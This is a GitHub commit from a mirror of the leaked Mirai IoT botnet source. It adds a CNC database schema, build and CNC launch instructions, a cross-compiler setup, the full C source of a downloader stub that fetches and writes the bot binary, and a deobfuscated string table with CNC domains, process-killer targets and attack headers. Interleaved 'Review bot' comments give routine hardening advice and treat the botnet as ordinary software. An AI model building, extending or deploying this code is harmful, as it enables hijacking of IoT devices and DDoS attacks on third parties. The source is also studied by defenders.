mirror of https://github.com/jgamblin/Mirai-Source-Code synced 2024-06-14 01:06:50 +00:00
This commit is contained in:
chuckixia 2016-10-12 18:38:43 +00:00 committed by GitHub
commit 5a83eec32b
23 changed files with 613 additions and 68 deletions


@ -0,0 +1,41 @@
DROP DATABASE IF EXISTS mirai;
CREATE DATABASE mirai;
USE mirai;
CREATE TABLE `history` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id` int(10) unsigned NOT NULL,
`time_sent` int(10) unsigned NOT NULL,
`duration` int(10) unsigned NOT NULL,
`command` text NOT NULL,
`max_bots` int(11) DEFAULT '-1',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
);
CREATE TABLE `users` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`username` varchar(32) NOT NULL,
`password` varchar(32) NOT NULL,
`duration_limit` int(10) unsigned DEFAULT NULL,
`cooldown` int(10) unsigned NOT NULL,
`wrc` int(10) unsigned DEFAULT NULL,
`last_paid` int(10) unsigned NOT NULL,
`max_bots` int(11) DEFAULT '-1',
`admin` int(10) unsigned DEFAULT '0',
`intvl` int(10) unsigned DEFAULT '30',
`api_key` text,
PRIMARY KEY (`id`),
KEY `username` (`username`)
);
CREATE TABLE `whitelist` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`prefix` varchar(16) DEFAULT NULL,
`netmask` tinyint(3) unsigned DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `prefix` (`prefix`)
);
INSERT INTO users (username, password, duration_limit, cooldown, wrc, last_paid, max_bots, admin, api_key)\
VALUES ( 'user', 'password',100, 0, 0, 0, 100, 1, 'foobar');
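Review bot: `users.password` at the `password varchar(32) NOT NULL` line stores the credential in cleartext, and the seed row inserted at the end commits a literal username/password pair to the repository; a schema that authenticates users should hold only a salted hash (widen `password` to fit the hash output) and any bootstrap account should be created out of band, not in the committed schema. `username` is only indexed (`KEY username`), not unique, so duplicate logins are accepted — `UNIQUE KEY users_username_uk (username)` closes that. The trailing `\` on the `INSERT INTO users (...)` line looks like a pasted shell line-continuation rather than SQL; MySQL continues a statement across newlines on its own, so it should be dropped (whether the client tolerates the stray backslash is not shown here). The integer columns `max_bots` and `admin` take quoted defaults (`DEFAULT '-1'`, `DEFAULT '0'`) that MySQL coerces silently; unquoted numeric defaults state the intent.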

42
README.md Executable file → Normal file

@ -1,3 +1,45 @@
# Mirai Botnet Client, Echo Loader and CNC source code
This is the source code released from [here](http://hackforums.net/showthread.php?tid=5420472) as discussed in this [Brian Krebs Post](https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
I found
mirai.src.zip from [VT](https://www.virustotal.com/en/file/68d01cd712da9c5f889ce774ae7ad41cd6fbc13c42864aa593b60c1f6a7cef63/analysis/)
loader.src.zip from [VT](https://www.virustotal.com/en/file/fffad2fbd1fa187a748f6d2009b942d4935878d2c062895cde53e71d125b735e/analysis/)
dlr.src.zip from [VT](https://www.virustotal.com/en/file/519d4e3f9bc80893838f94fd0365d587469f9468b4fa2ff0fb0c8f7e8fb99429/analysis/)
They may be the original files.
Configuring_CNC_Database.txt from [pastebin.com/86d0iL9g](http://pastebin.com/86d0iL9g)
Setting_Up_Cross_Compilers.sh from [pastebin.com/1rRCc3aD](http://pastebin.com/1rRCc3aD)
Felicitychou
Chuck:
Merged Felicitychou's additions and set up the Vagrant file.
To set up the build environment, you just need to run "vagrant up".
Also removed the obfuscation of table.c, so there is no need to run the "enc" tool anymore.
Have modified some shell scripts to install more cross compiler packages and remove errors
modified build.sh to download go packages
Steps to set up the build environment:
- git pull
- vagrant up
- vagrant ssh
- cd /vagrant/mirai
- ./build.sh
Steps to create database:
`cat Configure_CNC_Database.txt | mysql -u root --password=password`
Start the CnC
- make a prompt file in ./release
- `cd ./release`
- `sudo ./cnc`

68
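--- a/Setting_Up_Cross_Compilers.sh
+++ b/Setting_Up_Cross_Compilers.sh
@@ -0,0 +1,68 @@
+#!/bin/bash
+# RUN ALL OF THESE AS A PRIVELEGED USER, SINCE WE ARE DOWNLOADING INTO /etc
+apt-get install -y gcc golang electric-fence
+if [ ! -d "/etc/xcompile" ]; then
+pushd .
+mkdir /etc/xcompile
+cd /etc/xcompile
+echo "downloading cross compilers"
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
+wget --quiet https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
+echo "unpacking cross compilers"
+tar -jxf cross-compiler-armv4l.tar.bz2
+tar -jxf cross-compiler-armv5l.tar.bz2
+tar -jxf cross-compiler-i586.tar.bz2
+tar -jxf cross-compiler-m68k.tar.bz2
+tar -jxf cross-compiler-mips.tar.bz2
+tar -jxf cross-compiler-mipsel.tar.bz2
+tar -jxf cross-compiler-powerpc.tar.bz2
+tar -jxf cross-compiler-sh4.tar.bz2
+tar -jxf cross-compiler-sparc.tar.bz2
+echo "deleting cross compilers"
+rm *.tar.bz2
+mv cross-compiler-armv4l armv4l
+mv cross-compiler-armv5l armv5l
+mv cross-compiler-i586 i586
+mv cross-compiler-m68k m68k
+mv cross-compiler-mips mips
+mv cross-compiler-mipsel mipsel
+mv cross-compiler-powerpc powerpc
+mv cross-compiler-sh4 sh4
+mv cross-compiler-sparc sparc
+popd
+fi
+# PUT THESE COMMANDS IN THE FILE ~/.bashrc
+# Cross compiler toolchains
+echo 'adding compiler toolchains to $PATH'
+echo '
+export PATH=$PATH:/etc/xcompile/armv4l/bin
+export PATH=$PATH:/etc/xcompile/armv5l/bin
+export PATH=$PATH:/etc/xcompile/i586/bin
+export PATH=$PATH:/etc/xcompile/m68k/bin
+export PATH=$PATH:/etc/xcompile/mips/bin
+export PATH=$PATH:/etc/xcompile/mipsel/bin
+export PATH=$PATH:/etc/xcompile/powerpc/bin
+export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
+export PATH=$PATH:/etc/xcompile/sh4/bin
+export PATH=$PATH:/etc/xcompile/sparc/bin
+# Golang
+export PATH=$PATH:/usr/local/go/bin
+export GOPATH=$HOME/Documents/go
+' >> /etc/bash.bashrc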
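Review bot: The nine toolchain tarballs fetched by the `wget --quiet` lines are unpacked and installed under /etc without any integrity check, and the script has no `set -e`, so a failed or truncated download still proceeds to `tar`, `rm *.tar.bz2` and `mv`, leaving a half-populated /etc/xcompile that the `! -d "/etc/xcompile"` guard will then skip on every later run. Add `set -euo pipefail` after the shebang and verify each archive against a pinned digest before unpacking (`sha256sum -c <PINNED_CHECKSUMS_FILE>` with the checksum list committed next to the script). The final `echo '...' >> /etc/bash.bashrc` is not idempotent — each run appends the whole block again — and the comment above it still says `~/.bashrc`; guard it with `grep -q '/etc/xcompile/armv4l/bin' /etc/bash.bashrc || echo '…' >> /etc/bash.bashrc` and fix the comment to name /etc/bash.bashrc. Also note that `/etc/xcompile/powerpc-440fp/bin` is added to PATH although no powerpc-440fp toolchain is downloaded above, so that entry is dead.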

26
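--- a/Vagrantfile
+++ b/Vagrantfile
@@ -0,0 +1,26 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+# This vagrant sets up build environment for mirai botnet
+Vagrant.configure("2") do |config|
+# The most common configuration options are documented and commented below.
+# For a complete reference, please see the online documentation at
+# https://docs.vagrantup.com.
+# Every Vagrant development environment requires a box. You can search for
+# boxes at https://atlas.hashicorp.com/search.
+config.vm.box = "ubuntu/trusty64"
+# Enable provisioning with a shell script. Additional provisioners such as
+# Puppet, Chef, Ansible, Salt, and Docker are also available. Please see the
+# documentation for more information about their specific syntax and use.
+config.vm.provision "shell", inline: <<-SHELL
+debconf-set-selections <<< 'mysql-server mysql-server/root_password password password'
+debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password password'
+apt-get update
+apt-get upgrade -y
+apt-get install -y mysql-server mysql-client golang gcc electric-fence git
+chmod +x /vagrant/Setting_Up_Cross_Compilers.sh
+/vagrant/Setting_Up_Cross_Compilers.sh
+SHELL
+end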

BIN
dlr.src.zip Normal file

Binary file not shown.

22
dlr/build.sh Normal file

@ -0,0 +1,22 @@
armv4l-gcc -Os -D BOT_ARCH=\"arm\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm
armv6l-gcc -Os -D BOT_ARCH=\"arm7\" -D ARM -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.arm7
i686-gcc -Os -D BOT_ARCH=\"x86\" -D X32 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.x86
m68k-gcc -Os -D BOT_ARCH=\"m68k\" -D M68K -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.m68k
mips-gcc -Os -D BOT_ARCH=\"mips\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mips
#mips64-gcc -Os -D BOT_ARCH=\"mps64\" -D MIPS -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mps64
mipsel-gcc -Os -D BOT_ARCH=\"mpsl\" -D MIPSEL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.mpsl
powerpc-gcc -Os -D BOT_ARCH=\"ppc\" -D PPC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.ppc
sh4-gcc -Os -D BOT_ARCH=\"sh4\" -D SH4 -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh4
#sh2elf-gcc -Os -D BOT_ARCH=\"sh2el\" -D SH2EL -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2el
#sh2eb-gcc -Os -D BOT_ARCH=\"sh2eb\" -D SH2EB -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.sh2eb
sparc-gcc -Os -D BOT_ARCH=\"spc\" -D SPARC -Wl,--gc-sections -fdata-sections -ffunction-sections -e __start -nostartfiles -static main.c -o ./release/dlr.spc
armv4l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm
armv6l-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.arm7
i686-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.x86
m68k-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.m68k
mips-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mips
mipsel-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.mpsl
powerpc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.ppc
sh4-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.sh4
sparc-strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr ./release/dlr.spc

274
dlr/main.c Normal file

@ -0,0 +1,274 @@
#include <sys/types.h>
//#include <bits/syscalls.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
#define EXEC_MSG "MIRAI\n"
#define EXEC_MSG_LEN 6
#define DOWNLOAD_MSG "FIN\n"
#define DOWNLOAD_MSG_LEN 4
#define STDIN 0
#define STDOUT 1
#define STDERR 2
#if BYTE_ORDER == BIG_ENDIAN
#define HTONS(n) (n)
#define HTONL(n) (n)
#elif BYTE_ORDER == LITTLE_ENDIAN
#define HTONS(n) (((((unsigned short)(n) & 0xff)) << 8) | (((unsigned short)(n) & 0xff00) >> 8))
#define HTONL(n) (((((unsigned long)(n) & 0xff)) << 24) | \
((((unsigned long)(n) & 0xff00)) << 8) | \
((((unsigned long)(n) & 0xff0000)) >> 8) | \
((((unsigned long)(n) & 0xff000000)) >> 24))
#else
#error "Fix byteorder"
#endif
#ifdef __ARM_EABI__
#define SCN(n) ((n) & 0xfffff)
#else
#define SCN(n) (n)
#endif
inline void run(void);
int sstrlen(char *);
unsigned int utils_inet_addr(unsigned char, unsigned char, unsigned char, unsigned char);
/* stdlib calls */
int xsocket(int, int, int);
int xwrite(int, void *, int);
int xread(int, void *, int);
int xconnect(int, struct sockaddr_in *, int);
int xopen(char *, int, int);
int xclose(int);
void x__exit(int);
#define socket xsocket
#define write xwrite
#define read xread
#define connect xconnect
#define open xopen
#define close xclose
#define __exit x__exit
#ifdef DEBUG
/*
void xprintf(char *str)
{
write(1, str, sstrlen(str));
}
#define printf xprintf
*/
#endif
void __start(void)
{
#if defined(MIPS) || defined(MIPSEL)
__asm(
".set noreorder\n"
"move $0, $31\n"
"bal 10f\n"
"nop\n"
"10:\n.cpload $31\n"
"move $31, $0\n"
".set reorder\n"
);
#endif
run();
}
inline void run(void)
{
char recvbuf[128];
struct sockaddr_in addr;
int sfd, ffd, ret;
unsigned int header_parser = 0;
int arch_strlen = sstrlen(BOT_ARCH);
write(STDOUT, EXEC_MSG, EXEC_MSG_LEN);
addr.sin_family = AF_INET;
addr.sin_port = HTONS(80);
addr.sin_addr.s_addr = HTTP_SERVER;
ffd = open("dvrHelper", O_WRONLY | O_CREAT | O_TRUNC, 0777);
sfd = socket(AF_INET, SOCK_STREAM, 0);
#ifdef DEBUG
if (ffd == -1)
printf("Failed to open file!\n");
if (sfd == -1)
printf("Failed to call socket()\n");
#endif
if (sfd == -1 || ffd == -1)
__exit(1);
#ifdef DEBUG
printf("Connecting to host...\n");
#endif
if ((ret = connect(sfd, &addr, sizeof (struct sockaddr_in))) < 0)
{
#ifdef DEBUG
printf("Failed to connect to host.\n");
#endif
write(STDOUT, "NIF\n", 4);
__exit(-ret);
}
#ifdef DEBUG
printf("Connected to host\n");
#endif
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
{
#ifdef DEBUG
printf("Failed to send get request.\n");
#endif
__exit(3);
}
#ifdef DEBUG
printf("Started header parse...\n");
#endif
while (header_parser != 0x0d0a0d0a)
{
char ch;
int ret = read(sfd, &ch, 1);
if (ret != 1)
__exit(4);
header_parser = (header_parser << 8) | ch;
}
#ifdef DEBUG
printf("Finished receiving HTTP header\n");
#endif
while (1)
{
int ret = read(sfd, recvbuf, sizeof (recvbuf));
if (ret <= 0)
break;
write(ffd, recvbuf, ret);
}
close(sfd);
close(ffd);
write(STDOUT, DOWNLOAD_MSG, DOWNLOAD_MSG_LEN);
__exit(5);
}
int sstrlen(char *str)
{
int c = 0;
while (*str++ != 0)
c++;
return c;
}
unsigned int utils_inet_addr(unsigned char one, unsigned char two, unsigned char three, unsigned char four)
{
unsigned long ip = 0;
ip |= (one << 24);
ip |= (two << 16);
ip |= (three << 8);
ip |= (four << 0);
return HTONL(ip);
}
int xsocket(int domain, int type, int protocol)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("socket using socketcall\n");
#endif
struct {
int domain, type, protocol;
} socketcall;
socketcall.domain = domain;
socketcall.type = type;
socketcall.protocol = protocol;
// 1 == SYS_SOCKET
int ret = syscall(SCN(SYS_socketcall), 1, &socketcall);
#ifdef DEBUG
printf("socket got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("socket using socket\n");
#endif
return syscall(SCN(SYS_socket), domain, type, protocol);
#endif
}
int xread(int fd, void *buf, int len)
{
return syscall(SCN(SYS_read), fd, buf, len);
}
int xwrite(int fd, void *buf, int len)
{
return syscall(SCN(SYS_write), fd, buf, len);
}
int xconnect(int fd, struct sockaddr_in *addr, int len)
{
#if defined(__NR_socketcall)
#ifdef DEBUG
printf("connect using socketcall\n");
#endif
struct {
int fd;
struct sockaddr_in *addr;
int len;
} socketcall;
socketcall.fd = fd;
socketcall.addr = addr;
socketcall.len = len;
// 3 == SYS_CONNECT
int ret = syscall(SCN(SYS_socketcall), 3, &socketcall);
#ifdef DEBUG
printf("connect got ret: %d\n", ret);
#endif
return ret;
#else
#ifdef DEBUG
printf("connect using connect\n");
#endif
return syscall(SCN(SYS_connect), fd, addr, len);
#endif
}
int xopen(char *path, int flags, int other)
{
return syscall(SCN(SYS_open), path, flags, other);
}
int xclose(int fd)
{
return syscall(SCN(SYS_close), fd);
}
void x__exit(int code)
{
syscall(SCN(SYS_exit), code);
}

10
dlr/release/.build Normal file

@ -0,0 +1,10 @@
<proxseas> wtf why would you hit krebs
<tpres> Hm, why do you care? Just move C2 or something?
<proxseas> no fuck, this is the shit you avoid. fuck off
<proxseas> im kicking you off
<tpres> Are you fucking me? you better be joking
<proxseas> DO YOU HVE ANY IDEE
<proxseas> * IDEA
<proxseas> WHAT YOUVE DONE
<tpres> look man i was just messing around its nbd
<proxseas> YOU F UCKING IDIOT

BIN
dlr/release/dlr.arm Normal file

Binary file not shown.

BIN
dlr/release/dlr.arm7 Normal file

Binary file not shown.

BIN
dlr/release/dlr.m68k Normal file

Binary file not shown.

BIN
dlr/release/dlr.mips Normal file

Binary file not shown.

BIN
dlr/release/dlr.mpsl Normal file

Binary file not shown.

BIN
dlr/release/dlr.ppc Normal file

Binary file not shown.

BIN
dlr/release/dlr.sh4 Normal file

Binary file not shown.

BIN
dlr/release/dlr.spc Normal file

Binary file not shown.

BIN
loader.src.zip Normal file

Binary file not shown.

BIN
mirai.src.zip Normal file

Binary file not shown.


@ -15,64 +15,64 @@ struct table_value table[TABLE_MAX_KEYS];
void table_init(void)
{
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
add_entry(TABLE_CNC_PORT, "\x22\x35", 2); // 23
// removeed obfuscation
// use the folowing bash magic to create domain or other things for this hexadecimal escaped nonesense
//
// $echo example.com | hexdump -e '1/1 "\\\x"' -e '1/1 "%.2x"'
// \x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0a
// remember to add null byte on end
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2); // 48101
add_entry(TABLE_CNC_DOMAIN, "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x00", 12); //changed to example.com
add_entry(TABLE_CNC_PORT, "\x00\x17", 2);
add_entry(TABLE_SCAN_CB_DOMAIN, "\x72\x65\x70\x6f\x72\x74\x2e\x63\x68\x61\x6e\x67\x65\x6d\x65\x2e\x63\x6f\x6d\x00", 20);
add_entry(TABLE_SCAN_CB_PORT, "\xbb\xe5", 2);
add_entry(TABLE_EXEC_SUCCESS, "\x6c\x69\x73\x74\x65\x6e\x69\x6e\x67\x20\x74\x75\x6e\x30\x00", 15);
add_entry(TABLE_KILLER_SAFE, "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x79\x6f\x75\x74\x75\x2e\x62\x65\x2f\x64\x51\x77\x34\x77\x39\x57\x67\x58\x63\x51\x00", 29);
add_entry(TABLE_KILLER_PROC, "\x2f\x70\x72\x6f\x63\x2f\x00", 7);
add_entry(TABLE_KILLER_EXE, "\x2f\x65\x78\x65\x00", 5);
add_entry(TABLE_KILLER_DELETED, "\x20\x28\x64\x65\x6c\x65\x74\x65\x64\x29\x00", 11);
add_entry(TABLE_KILLER_FD, "\x2f\x66\x64\x00", 4);
add_entry(TABLE_KILLER_ANIME, "\x2e\x61\x6e\x69\x6d\x65\x00", 7);
add_entry(TABLE_KILLER_STATUS, "\x2f\x73\x74\x61\x74\x75\x73\x00", 8);
add_entry(TABLE_MEM_QBOT, "\x52\x45\x50\x4f\x52\x54\x20\x25\x73\x3a\x25\x73\x00", 13);
add_entry(TABLE_MEM_QBOT2, "\x48\x54\x54\x50\x46\x4c\x4f\x4f\x44\x00", 10);
add_entry(TABLE_MEM_QBOT3, "\x4c\x4f\x4c\x4e\x4f\x47\x54\x46\x4f\x00", 10);
add_entry(TABLE_MEM_UPX, "\x5c\x78\x35\x38\x5c\x78\x34\x44\x5c\x78\x34\x45\x5c\x78\x34\x45\x5c\x78\x34\x33\x5c\x78\x35\x30\x5c\x78\x34\x36\x5c\x78\x32\x32\x00", 33);
add_entry(TABLE_MEM_ZOLLARD, "\x7a\x6f\x6c\x6c\x61\x72\x64\x00", 8);
add_entry(TABLE_MEM_REMAITEN, "\x47\x45\x54\x4c\x4f\x43\x41\x4c\x49\x50\x00", 11);
add_entry(TABLE_SCAN_SHELL, "\x73\x68\x65\x6c\x6c\x00", 6);
add_entry(TABLE_SCAN_ENABLE, "\x65\x6e\x61\x62\x6c\x65\x00", 7);
add_entry(TABLE_SCAN_SYSTEM, "\x73\x79\x73\x74\x65\x6d\x00", 7);
add_entry(TABLE_SCAN_SH, "\x73\x68\x00", 3);
add_entry(TABLE_SCAN_QUERY, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x4d\x49\x52\x41\x49\x00", 19);
add_entry(TABLE_SCAN_RESP, "\x4d\x49\x52\x41\x49\x3a\x20\x61\x70\x70\x6c\x65\x74\x20\x6e\x6f\x74\x20\x66\x6f\x75\x6e\x64\x00", 24);
add_entry(TABLE_SCAN_NCORRECT, "\x6e\x63\x6f\x72\x72\x65\x63\x74\x00", 9);
add_entry(TABLE_SCAN_PS, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x70\x73\x00", 16);
add_entry(TABLE_SCAN_KILL_9, "\x2f\x62\x69\x6e\x2f\x62\x75\x73\x79\x62\x6f\x78\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x00", 22);
add_entry(TABLE_ATK_VSE, "\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65\x20\x51\x75\x65\x72\x79\x00", 21);
add_entry(TABLE_ATK_RESOLVER, "\x2f\x65\x74\x63\x2f\x72\x65\x73\x6f\x6c\x76\x2e\x63\x6f\x6e\x66\x00", 17);
add_entry(TABLE_ATK_NSERV, "\x6e\x61\x6d\x65\x73\x65\x72\x76\x65\x72\x20\x00", 12);
add_entry(TABLE_ATK_KEEP_ALIVE, "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 23);
add_entry(TABLE_ATK_ACCEPT, "\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x00", 83);
add_entry(TABLE_ATK_ACCEPT_LNG, "\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x38\x00", 32);
add_entry(TABLE_ATK_CONTENT_TYPE, "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x00", 48);
add_entry(TABLE_ATK_SET_COOKIE, "\x73\x65\x74\x43\x6f\x6f\x6b\x69\x65\x28\x27\x00", 12);
add_entry(TABLE_ATK_REFRESH_HDR, "\x72\x65\x66\x72\x65\x73\x68\x3a\x00", 9);
add_entry(TABLE_ATK_LOCATION_HDR, "\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x00", 10);
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x73\x65\x74\x2d\x63\x6f\x6f\x6b\x69\x65\x3a\x00", 12);
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x00", 16);
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x74\x72\x61\x6e\x73\x66\x65\x72\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x00", 19);
add_entry(TABLE_ATK_CHUNKED, "\x63\x68\x75\x6e\x6b\x65\x64\x00", 8);
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x00", 11);
add_entry(TABLE_ATK_CONNECTION_HDR, "\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x00", 12);
add_entry(TABLE_ATK_DOSARREST, "\x73\x65\x72\x76\x65\x72\x3a\x20\x64\x6f\x73\x61\x72\x72\x65\x73\x74\x00", 18);
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x73\x65\x72\x76\x65\x72\x3a\x20\x63\x6c\x6f\x75\x64\x66\x6c\x61\x72\x65\x2d\x6e\x67\x69\x6e\x78\x00", 25);
add_entry(TABLE_HTTP_ONE, "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x35\x31\x2e\x30\x2e\x32\x37\x30\x34\x2e\x31\x30\x33\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x00", 111);
